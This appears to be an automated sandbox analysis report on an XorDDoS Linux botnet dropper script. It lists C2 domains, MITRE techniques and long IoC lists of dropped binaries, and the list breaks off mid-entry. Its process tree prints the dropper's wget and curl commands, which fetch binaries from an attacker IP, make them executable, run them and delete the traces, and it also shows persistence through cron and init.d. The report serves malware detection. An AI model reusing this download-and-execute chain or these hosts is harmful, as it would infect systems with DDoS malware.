xorddos | ec991cf6eac0354077622d016f3408b35372c4bbb44e86bc250bc1fcbafedfc4

Analysis

max time kernel
149s
max time network
148s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
22-12-2024 07:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

112.sh
Size

318B
MD5

0368897400a135549c0a2d9d83d384cc
SHA1

29c933b2a8dd201b4aaea73789664dda02c2fe75
SHA256

ec991cf6eac0354077622d016f3408b35372c4bbb44e86bc250bc1fcbafedfc4
SHA512

00216c30c5ab73b63821846febd159ac0be3c5a6658921ce9753c858ff2f83d698518c67283a9b2bea9da6067698b1302b6d84bf65ada476aba60bc35eedd758

Score

10^/10

xorddos botnet defense_evasion discovery downloader execution persistence privilege_escalatio

Malware Config

Extracted

Family

xorddos

api.markerbio.com:112

api.enoan2107.com:112

http://qq.com/lib.asp

Attributes

crc_polynomial
CDB88320

xor.plain

Signatures

XorDDoS
Botnet and downloader malware targeting Linux-based operating systems and IoT devices.
botnet downloader xorddos

XorDDoS payload 3 IoCs

resource	yara_rule
behavioral1/files/fstream-1.dat	family_xorddos
behavioral1/files/fstream-4.dat	family_xorddos
behavioral1/files/fstream-97.dat	family_xorddos

Xorddos family
xorddos

File and Directory Permissions Modification 1 TTPs 2 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1510	chmod
1644	chmod

Deletes itself 64 IoCs

pid	Process
1512	112
1522	mzzsrza
1525	xvtifwd
1528	xgswwdir
1531	mwkzlxkuawdy
1534	pxykgfgj
1537	pcclhkf
1540	ybrxpoj
1543	rhprkgpkqxq
1547	gcdxgfl
1549	rswrvopke
1555	nzikhqvwjptbl
1558	svpsrpacgvt
1561	acvxhiysuf
1564	sdthywsjoqzh
1567	qhkycfocijbp
1571	zjngthkppkl
1574	uazvjhlqtj
1578	yzzgkbydcjs
1580	davsrhda
1583	fawojjheuc
1586	tbldelihudsxf
1589	rwwxwye
1592	wtjicnceqyhd
1595	oomvkppiuebqaa
1598	yfpxayfcmhiefr
1601	jfxvchmr
1605	gvtywvmw
1607	btacyeoiospg
1610	ynyvqhhh
1613	nfulbpaz
1620	dtsftztbnn
1619	vqrjonzy
1622	ixinrvqixqybl
1625	ieucghrzdiqmyd
1628	waxvklofd
1631	fvxggqol
1634	stumszwkn
1637	qctqzqamf
1640	qcmlbuuu
1643	fgdyapsbneokuq
1653	klsqzppvk
1657	mqvmccwuei
1660	gdcaoj
1663	tjjjdkw
1666	bgernqjjfm
1669	bislsa
1672	uaediymtjpghz
1675	qdydvimaw
1678	dgsrzsht
1682	ozeonaxfg
1684	gnyjnc
1687	vqjtqmak
1690	zenuabvfplhoq
1693	uyavjnxp
1696	pyeingssfzfczg
1699	gxknlcciacdj
1702	czfrzlzm
1705	ufztkbutdb
1708	nqeqtoqx
1711	arvbwmaio
1714	ciubbg
1717	vbiysvpyn
1720	oehhgzchvqj

Executes dropped EXE 64 IoCs

ioc	pid	Process
/tmp/112	1511	112
/bin/wnskpkym	1516	wnskpkym
/bin/mzzsrza	1521	mzzsrza
/bin/xvtifwd	1524	xvtifwd
/bin/xgswwdir	1527	xgswwdir
/bin/mwkzlxkuawdy	1530	mwkzlxkuawdy
/bin/pxykgfgj	1533	pxykgfgj
/bin/pcclhkf	1536	pcclhkf
/bin/ybrxpoj	1539	ybrxpoj
/bin/rhprkgpkqxq	1542	rhprkgpkqxq
/bin/gcdxgfl	1545	gcdxgfl
/bin/rswrvopke	1548	rswrvopke
/bin/nzikhqvwjptbl	1554	nzikhqvwjptbl
/bin/svpsrpacgvt	1557	svpsrpacgvt
/bin/acvxhiysuf	1560	acvxhiysuf
/bin/sdthywsjoqzh	1563	sdthywsjoqzh
/bin/qhkycfocijbp	1566	qhkycfocijbp
/bin/zjngthkppkl	1570	zjngthkppkl
/bin/uazvjhlqtj	1573	uazvjhlqtj
/bin/yzzgkbydcjs	1576	yzzgkbydcjs
/bin/davsrhda	1579	davsrhda
/bin/fawojjheuc	1582	fawojjheuc
/bin/tbldelihudsxf	1585	tbldelihudsxf
/bin/rwwxwye	1588	rwwxwye
/bin/wtjicnceqyhd	1591	wtjicnceqyhd
/bin/oomvkppiuebqaa	1594	oomvkppiuebqaa
/bin/yfpxayfcmhiefr	1597	yfpxayfcmhiefr
/bin/jfxvchmr	1600	jfxvchmr
/bin/gvtywvmw	1603	gvtywvmw
/bin/btacyeoiospg	1606	btacyeoiospg
/bin/ynyvqhhh	1609	ynyvqhhh
/bin/nfulbpaz	1612	nfulbpaz
/bin/vqrjonzy	1617	vqrjonzy
/bin/dtsftztbnn	1615	dtsftztbnn
/bin/ixinrvqixqybl	1621	ixinrvqixqybl
/bin/ieucghrzdiqmyd	1624	ieucghrzdiqmyd
/bin/waxvklofd	1627	waxvklofd
/bin/fvxggqol	1630	fvxggqol
/bin/stumszwkn	1633	stumszwkn
/bin/qctqzqamf	1636	qctqzqamf
/bin/qcmlbuuu	1639	qcmlbuuu
/bin/fgdyapsbneokuq	1642	fgdyapsbneokuq
/tmp/112s	1645	112s
/bin/klsqzppvk	1652	klsqzppvk
/bin/mqvmccwuei	1656	mqvmccwuei
/bin/gdcaoj	1659	gdcaoj
/bin/tjjjdkw	1662	tjjjdkw
/bin/bgernqjjfm	1665	bgernqjjfm
/bin/bislsa	1668	bislsa
/bin/uaediymtjpghz	1671	uaediymtjpghz
/bin/qdydvimaw	1674	qdydvimaw
/bin/dgsrzsht	1677	dgsrzsht
/bin/ozeonaxfg	1680	ozeonaxfg
/bin/gnyjnc	1683	gnyjnc
/bin/vqjtqmak	1686	vqjtqmak
/bin/zenuabvfplhoq	1689	zenuabvfplhoq
/bin/uyavjnxp	1692	uyavjnxp
/bin/pyeingssfzfczg	1695	pyeingssfzfczg
/bin/gxknlcciacdj	1698	gxknlcciacdj
/bin/czfrzlzm	1701	czfrzlzm
/bin/ufztkbutdb	1704	ufztkbutdb
/bin/nqeqtoqx	1707	nqeqtoqx
/bin/arvbwmaio	1710	arvbwmaio
/bin/ciubbg	1713	ciubbg

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	114.114.114.114

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

description	ioc	Process
File opened for modification	/etc/cron.hourly/mykpksnw.sh	wnskpkym

Enumerates active TCP sockets 1 TTPs 1 IoCs

Gets active TCP sockets from /proc virtual filesystem.

discovery

System Network Connections Discovery

T1049

description	ioc	Process
File opened for reading	/proc/net/tcp	wnskpkym

Enumerates running processes
Discovers information about currently running processes on the system

Modifies init.d 2 TTPs 1 IoCs

Adds/modifies system service, likely for persistence.

persistence

Boot or Logon Autostart Execution

T1547

RC Scripts

T1037.004

description	ioc	Process
File opened for modification	/etc/init.d/mykpksnw	wnskpkym

Writes file to system bin folder 64 IoCs

description	ioc	Process
File opened for modification	/bin/rhprkgpkqxq	wnskpkym
File opened for modification	/bin/uojfyyyqrhlu	wnskpkym
File opened for modification	/bin/hdwgmev	wnskpkym
File opened for modification	/bin/ixykach	wnskpkym
File opened for modification	/bin/zldfzotvp	wnskpkym
File opened for modification	/bin/rlapjkadmx	wnskpkym
File opened for modification	/bin/ckhwwkakig	wnskpkym
File opened for modification	/bin/qhkycfocijbp	wnskpkym
File opened for modification	/bin/rwwxwye	wnskpkym
File opened for modification	/bin/qtnqkqrganlip	wnskpkym
File opened for modification	/bin/jnwxdfyb	wnskpkym
File opened for modification	/bin/jhlgeqojc	wnskpkym
File opened for modification	/bin/cdrpntmjb	wnskpkym
File opened for modification	/bin/wnskpkym	112
File opened for modification	/bin/mqvmccwuei	wnskpkym
File opened for modification	/bin/ufztkbutdb	wnskpkym
File opened for modification	/bin/arvbwmaio	wnskpkym
File opened for modification	/bin/qqbmpsrzn	wnskpkym
File opened for modification	/bin/qdydvimaw	wnskpkym
File opened for modification	/bin/nmzfbshwsjnlb	wnskpkym
File opened for modification	/bin/vddxhhbwmtufjw	wnskpkym
File opened for modification	/bin/rlqclepcmmj	wnskpkym
File opened for modification	/bin/whimojayflaw	wnskpkym
File opened for modification	/bin/kyyhkravgvxxcx	wnskpkym
File opened for modification	/bin/yfpxayfcmhiefr	wnskpkym
File opened for modification	/bin/fgdyapsbneokuq	wnskpkym
File opened for modification	/bin/idknvi	wnskpkym
File opened for modification	/bin/mpqxxccaj	wnskpkym
File opened for modification	/bin/zjngthkppkl	wnskpkym
File opened for modification	/bin/yzzgkbydcjs	wnskpkym
File opened for modification	/bin/hnapjefgre	wnskpkym
File opened for modification	/bin/bopxrqokbgnpk	wnskpkym
File opened for modification	/bin/vecrihwnighz	wnskpkym
File opened for modification	/bin/mzzsrza	wnskpkym
File opened for modification	/bin/nfulbpaz	wnskpkym
File opened for modification	/bin/pyeingssfzfczg	wnskpkym
File opened for modification	/bin/uvqgamiwjapy	wnskpkym
File opened for modification	/bin/tjjjdkw	wnskpkym
File opened for modification	/bin/ikrgsfl	wnskpkym
File opened for modification	/bin/inrptjvborar	wnskpkym
File opened for modification	/bin/buktfiabw	wnskpkym
File opened for modification	/bin/mbxcrbpaxnkz	wnskpkym
File opened for modification	/bin/mwkzlxkuawdy	wnskpkym
File opened for modification	/bin/gvtywvmw	wnskpkym
File opened for modification	/bin/pamdkpjtc	wnskpkym
File opened for modification	/bin/ebvysnppsxa	wnskpkym
File opened for modification	/bin/rdytpp	wnskpkym
File opened for modification	/bin/uazvjhlqtj	wnskpkym
File opened for modification	/bin/uyavjnxp	wnskpkym
File opened for modification	/bin/cxpqboyqyo	wnskpkym
File opened for modification	/bin/xwjpeqnr	wnskpkym
File opened for modification	/bin/hjuphmavxbn	wnskpkym
File opened for modification	/bin/mykpksnw	wnskpkym
File opened for modification	/bin/czfrzlzm	wnskpkym
File opened for modification	/bin/jbjvtjwxoqxsnn	wnskpkym
File opened for modification	/bin/fawutwiycbcvs	wnskpkym
File opened for modification	/bin/ynyvqhhh	wnskpkym
File opened for modification	/bin/vbiysvpyn	wnskpkym
File opened for modification	/bin/emasuhlajib	wnskpkym
File opened for modification	/bin/tacpqrcg	wnskpkym
File opened for modification	/bin/wclhfy	wnskpkym
File opened for modification	/bin/bqsygivbwigscg	wnskpkym
File opened for modification	/bin/ybrxpoj	wnskpkym
File opened for modification	/bin/davsrhda	wnskpkym

Reads system network configuration 1 TTPs 1 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/tcp	wnskpkym

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/1062/fd	wnskpkym
File opened for reading	/proc/1723/fd	wnskpkym
File opened for reading	/proc/971/fd	wnskpkym
File opened for reading	/proc/1687/fd	wnskpkym
File opened for reading	/proc/1738/fd	wnskpkym
File opened for reading	/proc/963/fd	wnskpkym
File opened for reading	/proc/1114/fd	wnskpkym
File opened for reading	/proc/1331/fd	wnskpkym
File opened for reading	/proc/1607/fd	wnskpkym
File opened for reading	/proc/740/fd	wnskpkym
File opened for reading	/proc/1640/fd	wnskpkym
File opened for reading	/proc/1939/fd	wnskpkym
File opened for reading	/proc/1945/fd	wnskpkym
File opened for reading	/proc/414/fd	wnskpkym
File opened for reading	/proc/1613/fd	wnskpkym
File opened for reading	/proc/1858/fd	wnskpkym
File opened for reading	/proc/1885/fd	wnskpkym
File opened for reading	/proc/669/fd	wnskpkym
File opened for reading	/proc/1139/fd	wnskpkym
File opened for reading	/proc/1828/fd	wnskpkym
File opened for reading	/proc/1954/fd	wnskpkym
File opened for reading	/proc/469/fd	wnskpkym
File opened for reading	/proc/1086/fd	wnskpkym
File opened for reading	/proc/1678/fd	wnskpkym
File opened for reading	/proc/1783/fd	wnskpkym
File opened for reading	/proc/1583/fd	wnskpkym
File opened for reading	/proc/1894/fd	wnskpkym
File opened for reading	/proc/1759/fd	wnskpkym
File opened for reading	/proc/948/fd	wnskpkym
File opened for reading	/proc/1058/fd	wnskpkym
File opened for reading	/proc/1714/fd	wnskpkym
File opened for reading	/proc/1732/fd	wnskpkym
File opened for reading	/proc/1864/fd	wnskpkym
File opened for reading	/proc/727/fd	wnskpkym
File opened for reading	/proc/1068/fd	wnskpkym
File opened for reading	/proc/1134/fd	wnskpkym
File opened for reading	/proc/1762/fd	wnskpkym
File opened for reading	/proc/447/fd	wnskpkym
File opened for reading	/proc/1158/fd	wnskpkym
File opened for reading	/proc/1717/fd	wnskpkym
File opened for reading	/proc/1813/fd	wnskpkym
File opened for reading	/proc/1270/fd	wnskpkym
File opened for reading	/proc/1798/fd	wnskpkym
File opened for reading	/proc/1951/fd	wnskpkym
File opened for reading	/proc/1777/fd	wnskpkym
File opened for reading	/proc/460/fd	wnskpkym
File opened for reading	/proc/945/fd	wnskpkym
File opened for reading	/proc/1497/fd	wnskpkym
File opened for reading	/proc/1741/fd	wnskpkym
File opened for reading	/proc/1475/fd	wnskpkym
File opened for reading	/proc/1620/fd	wnskpkym
File opened for reading	/proc/1810/fd	wnskpkym
File opened for reading	/proc/686/fd	wnskpkym
File opened for reading	/proc/470/fd	wnskpkym
File opened for reading	/proc/1586/fd	wnskpkym
File opened for reading	/proc/1622/fd	wnskpkym
File opened for reading	/proc/1774/fd	wnskpkym
File opened for reading	/proc/672/fd	wnskpkym
File opened for reading	/proc/1153/fd	wnskpkym
File opened for reading	/proc/1172/fd	wnskpkym
File opened for reading	/proc/1924/fd	wnskpkym
File opened for reading	/proc/613/fd	wnskpkym
File opened for reading	/proc/1657/fd	wnskpkym
File opened for reading	/proc/1708/fd	wnskpkym

Writes file to shm directory 3 IoCs

Malware can drop malicious files in the shm directory which will run directly from RAM.

description	ioc	Process
File opened for modification	/dev/shm/sem.gpyibt	wnskpkym
File opened for modification	/dev/shm/sem.BxtDAM	wnskpkym
File opened for modification	/dev/shm/sem.gpyibt	klsqzppvk

Writes file to tmp directory 4 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/112s	curl
File opened for modification	/tmp/112	wget
File opened for modification	/tmp/112	curl
File opened for modification	/tmp/112s	wget

/tmp/112.sh
/tmp/112.sh
1⤵
PID:1497
- /usr/bin/wget
  wget http://43.249.172.195:888/112
  2⤵
  - Writes file to tmp directory
  PID:1498
- /usr/bin/curl
  curl -O http://43.249.172.195:888/112
  2⤵
  - Writes file to tmp directory
  PID:1509
- /bin/chmod
  chmod +x 112
  2⤵
  - File and Directory Permissions Modification
  PID:1510
- /tmp/112
  ./112
  2⤵
  - Deletes itself
  - Executes dropped EXE
  - Writes file to system bin folder
  PID:1511
- /usr/bin/wget
  wget http://43.249.172.195:888/112s
  2⤵
  - Writes file to tmp directory
  PID:1513
- /usr/bin/curl
  curl -O http://43.249.172.195:888/112s
  2⤵
  - Writes file to tmp directory
  PID:1568
- /bin/chmod
  chmod +x 112s
  2⤵
  - File and Directory Permissions Modification
  PID:1644
- /tmp/112s
  ./112s
  2⤵
  - Executes dropped EXE
  PID:1645
- /bin/rm
  rm -rf 112.sh
  2⤵
  PID:1647
- /bin/rm
  rm -rf 112
  2⤵
  PID:1648
- /bin/rm
  rm -rf 112s
  2⤵
  PID:1649

/bin/wnskpkym
/bin/wnskpkym
1⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Enumerates active TCP sockets
- Modifies init.d
- Writes file to system bin folder
- Reads system network configuration
- Reads runtime system information
- Writes file to shm directory
PID:1516

/bin/mzzsrza
/bin/mzzsrza -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1521

/bin/xvtifwd
/bin/xvtifwd -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1524

/bin/xgswwdir
/bin/xgswwdir -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1527

/bin/mwkzlxkuawdy
/bin/mwkzlxkuawdy -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1530

/bin/pxykgfgj
/bin/pxykgfgj -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1533

/bin/pcclhkf
/bin/pcclhkf -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1536

/bin/ybrxpoj
/bin/ybrxpoj -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1539

/bin/rhprkgpkqxq
/bin/rhprkgpkqxq -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1542

/bin/gcdxgfl
/bin/gcdxgfl -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1545

/bin/rswrvopke
/bin/rswrvopke -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1548

/bin/nzikhqvwjptbl
/bin/nzikhqvwjptbl -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1554

/bin/svpsrpacgvt
/bin/svpsrpacgvt -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1557

/bin/acvxhiysuf
/bin/acvxhiysuf -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1560

/bin/sdthywsjoqzh
/bin/sdthywsjoqzh -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1563

/bin/qhkycfocijbp
/bin/qhkycfocijbp -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1566

/bin/zjngthkppkl
/bin/zjngthkppkl -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1570

/bin/uazvjhlqtj
/bin/uazvjhlqtj -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1573

/bin/yzzgkbydcjs
/bin/yzzgkbydcjs -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1576

/bin/davsrhda
/bin/davsrhda -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1579

/bin/fawojjheuc
/bin/fawojjheuc -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1582

/bin/tbldelihudsxf
/bin/tbldelihudsxf -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1585

/bin/rwwxwye
/bin/rwwxwye -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1588

/bin/wtjicnceqyhd
/bin/wtjicnceqyhd -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1591

/bin/oomvkppiuebqaa
/bin/oomvkppiuebqaa -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1594

/bin/yfpxayfcmhiefr
/bin/yfpxayfcmhiefr -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1597

/bin/jfxvchmr
/bin/jfxvchmr -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1600

/bin/gvtywvmw
/bin/gvtywvmw -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1603

/bin/btacyeoiospg
/bin/btacyeoiospg -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1606

/bin/ynyvqhhh
/bin/ynyvqhhh -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1609

/bin/nfulbpaz
/bin/nfulbpaz -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1612

/bin/vqrjonzy
/bin/vqrjonzy -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1617

/bin/dtsftztbnn
/bin/dtsftztbnn -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1615

/bin/ixinrvqixqybl
/bin/ixinrvqixqybl -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1621

/bin/ieucghrzdiqmyd
/bin/ieucghrzdiqmyd -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1624

/bin/waxvklofd
/bin/waxvklofd -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1627

/bin/fvxggqol
/bin/fvxggqol -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1630

/bin/stumszwkn
/bin/stumszwkn -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1633

/bin/qctqzqamf
/bin/qctqzqamf -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1636

/bin/qcmlbuuu
/bin/qcmlbuuu -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1639

/bin/fgdyapsbneokuq
/bin/fgdyapsbneokuq -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1642

/bin/klsqzppvk
/bin/klsqzppvk
1⤵
- Deletes itself
- Executes dropped EXE
- Writes file to shm directory
PID:1652

/bin/mqvmccwuei
/bin/mqvmccwuei -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1656

/bin/gdcaoj
/bin/gdcaoj -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1659

/bin/tjjjdkw
/bin/tjjjdkw -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1662

/bin/bgernqjjfm
/bin/bgernqjjfm -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1665

/bin/bislsa
/bin/bislsa -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1668

/bin/uaediymtjpghz
/bin/uaediymtjpghz -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1671

/bin/qdydvimaw
/bin/qdydvimaw -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1674

/bin/dgsrzsht
/bin/dgsrzsht -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1677

/bin/ozeonaxfg
/bin/ozeonaxfg -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1680

/bin/gnyjnc
/bin/gnyjnc -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1683

/bin/vqjtqmak
/bin/vqjtqmak -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1686

/bin/zenuabvfplhoq
/bin/zenuabvfplhoq -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1689

/bin/uyavjnxp
/bin/uyavjnxp -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1692

/bin/pyeingssfzfczg
/bin/pyeingssfzfczg -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1695

/bin/gxknlcciacdj
/bin/gxknlcciacdj -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1698

/bin/czfrzlzm
/bin/czfrzlzm -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1701

/bin/ufztkbutdb
/bin/ufztkbutdb -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1704

/bin/nqeqtoqx
/bin/nqeqtoqx -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1707

/bin/arvbwmaio
/bin/arvbwmaio -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1710

/bin/ciubbg
/bin/ciubbg -d 1517
1⤵
- Deletes itself
- Executes dropped EXE
PID:1713

/bin/vbiysvpyn
/bin/vbiysvpyn -d 1517
1⤵
- Deletes itself
PID:1716

/bin/oehhgzchvqj
/bin/oehhgzchvqj -d 1517
1⤵
- Deletes itself
PID:1719

/bin/ewhoslpzqn
/bin/ewhoslpzqn -d 1517
1⤵
PID:1722

/bin/alwvcujmipu
/bin/alwvcujmipu -d 1517
1⤵
PID:1725

/bin/vtteqmnysmf
/bin/vtteqmnysmf -d 1517
1⤵
PID:1728

/bin/esyfiliizegbb
/bin/esyfiliizegbb -d 1517
1⤵
PID:1731

/bin/qlgkddfyhxkuv
/bin/qlgkddfyhxkuv -d 1517
1⤵
PID:1734

/bin/idknvi
/bin/idknvi -d 1517
1⤵
PID:1737

/bin/gweqxlw
/bin/gweqxlw -d 1517
1⤵
PID:1740

/bin/mpqxxccaj
/bin/mpqxxccaj -d 1517
1⤵
PID:1743

/bin/jhlgeqojc
/bin/jhlgeqojc -d 1517
1⤵
PID:1746

/bin/hnapjefgre
/bin/hnapjefgre -d 1517
1⤵
PID:1749

/bin/dvzdtbfvlihu
/bin/dvzdtbfvlihu -d 1517
1⤵
PID:1752

/bin/pamdkpjtc
/bin/pamdkpjtc -d 1517
1⤵
PID:1755

/bin/inrptjvborar
/bin/inrptjvborar -d 1517
1⤵
PID:1758

/bin/czhphqjdfjqjv
/bin/czhphqjdfjqjv -d 1517
1⤵
PID:1761

/bin/uojfyyyqrhlu
/bin/uojfyyyqrhlu -d 1517
1⤵
PID:1764

/bin/cxpqboyqyo
/bin/cxpqboyqyo -d 1517
1⤵
PID:1767

/bin/buktfiabw
/bin/buktfiabw -d 1517
1⤵
PID:1770

/bin/ixjgncoazmdwbt
/bin/ixjgncoazmdwbt -d 1517
1⤵
PID:1773

/bin/qtnqkqrganlip
/bin/qtnqkqrganlip -d 1517
1⤵
PID:1776

/bin/hdwgmev
/bin/hdwgmev -d 1517
1⤵
PID:1779

/bin/uvqgamiwjapy
/bin/uvqgamiwjapy -d 1517
1⤵
PID:1782

/bin/bojhqwub
/bin/bojhqwub -d 1517
1⤵
PID:1785

/bin/ikrgsfl
/bin/ikrgsfl -d 1517
1⤵
PID:1788

/bin/whimojayflaw
/bin/whimojayflaw -d 1517
1⤵
PID:1791

/bin/qybbfs
/bin/qybbfs -d 1517
1⤵
PID:1794

/bin/cvomhftzmg
/bin/cvomhftzmg -d 1517
1⤵
PID:1797

/bin/jnwxdfyb
/bin/jnwxdfyb -d 1517
1⤵
PID:1800

/bin/jbjvtjwxoqxsnn
/bin/jbjvtjwxoqxsnn -d 1517
1⤵
PID:1803

/bin/uuytgg
/bin/uuytgg -d 1517
1⤵
PID:1806

/bin/pvenzjlcywgh
/bin/pvenzjlcywgh -d 1517
1⤵
PID:1809

/bin/bqsygivbwigscg
/bin/bqsygivbwigscg -d 1517
1⤵
PID:1812

/bin/jmvahznila
/bin/jmvahznila -d 1517
1⤵
PID:1815

/bin/jxtsqu
/bin/jxtsqu -d 1517
1⤵
PID:1818

/bin/itstqtr
/bin/itstqtr -d 1517
1⤵
PID:1821

/bin/zldfzotvp
/bin/zldfzotvp -d 1517
1⤵
PID:1824

/bin/wclhfy
/bin/wclhfy -d 1517
1⤵
PID:1827

/bin/crmuoyfhrazmty
/bin/crmuoyfhrazmty -d 1517
1⤵
PID:1830

/bin/eetespzhsxmfh
/bin/eetespzhsxmfh -d 1517
1⤵
PID:1833

/bin/gzxzotnoy
/bin/gzxzotnoy -d 1517
1⤵
PID:1836

/bin/fawutwiycbcvs
/bin/fawutwiycbcvs -d 1517
1⤵
PID:1839

/bin/emasuhlajib
/bin/emasuhlajib -d 1517
1⤵
PID:1842

/bin/epncnvflp
/bin/epncnvflp -d 1517
1⤵
PID:1845

/bin/ixykach
/bin/ixykach -d 1517
1⤵
PID:1848

/bin/fohigbrubcedbi
/bin/fohigbrubcedbi -d 1517
1⤵
PID:1851

/bin/rnjmsvbsfa
/bin/rnjmsvbsfa -d 1517
1⤵
PID:1854

/bin/ratzvbpd
/bin/ratzvbpd -d 1517
1⤵
PID:1857

/bin/vecrihwnighz
/bin/vecrihwnighz -d 1517
1⤵
PID:1860

/bin/qnnnqgs
/bin/qnnnqgs -d 1517
1⤵
PID:1863

/bin/xkrslmtar
/bin/xkrslmtar -d 1517
1⤵
PID:1866

/bin/xwjpeqnr
/bin/xwjpeqnr -d 1517
1⤵
PID:1869

/bin/tacpqrcg
/bin/tacpqrcg -d 1517
1⤵
PID:1872

/bin/kyyhkravgvxxcx
/bin/kyyhkravgvxxcx -d 1517
1⤵
PID:1875

/bin/nmzfbshwsjnlb
/bin/nmzfbshwsjnlb -d 1517
1⤵
PID:1878

/bin/rlapjkadmx
/bin/rlapjkadmx -d 1517
1⤵
PID:1881

/bin/jxgnucai
/bin/jxgnucai -d 1517
1⤵
PID:1884

/bin/hjuphmavxbn
/bin/hjuphmavxbn -d 1517
1⤵
PID:1887

/bin/opiyzibnhkx
/bin/opiyzibnhkx -d 1517
1⤵
PID:1890

/bin/skauniwutsl
/bin/skauniwutsl -d 1517
1⤵
PID:1893

/bin/emyeplueacc
/bin/emyeplueacc -d 1517
1⤵
PID:1896

/bin/mfrwrqcjbdgq
/bin/mfrwrqcjbdgq -d 1517
1⤵
PID:1899

/bin/ckhwwkakig
/bin/ckhwwkakig -d 1517
1⤵
PID:1902

/bin/vddxhhbwmtufjw
/bin/vddxhhbwmtufjw -d 1517
1⤵
PID:1905

/bin/mbxcrbpaxnkz
/bin/mbxcrbpaxnkz -d 1517
1⤵
PID:1908

/bin/ugwplaoshqq
/bin/ugwplaoshqq -d 1517
1⤵
PID:1911

/bin/lkbujujkrld
/bin/lkbujujkrld -d 1517
1⤵
PID:1914

/bin/cdrpntmjb
/bin/cdrpntmjb -d 1517
1⤵
PID:1917

/bin/amlpguhxqsju
/bin/amlpguhxqsju -d 1517
1⤵
PID:1920

/bin/soxfijicnmwdb
/bin/soxfijicnmwdb -d 1517
1⤵
PID:1923

/bin/rlqclepcmmj
/bin/rlqclepcmmj -d 1517
1⤵
PID:1926

/bin/ebvysnppsxa
/bin/ebvysnppsxa -d 1517
1⤵
PID:1929

/bin/bopxrqokbgnpk
/bin/bopxrqokbgnpk -d 1517
1⤵
PID:1932

/bin/txqfivifvatkq
/bin/txqfivifvatkq -d 1517
1⤵
PID:1935

/bin/jqqlefkxwzizf
/bin/jqqlefkxwzizf -d 1517
1⤵
PID:1938

/bin/qqbmpsrzn
/bin/qqbmpsrzn -d 1517
1⤵
PID:1941

/bin/hiacvqpeigpn
/bin/hiacvqpeigpn -d 1517
1⤵
PID:1944

/bin/amjbul
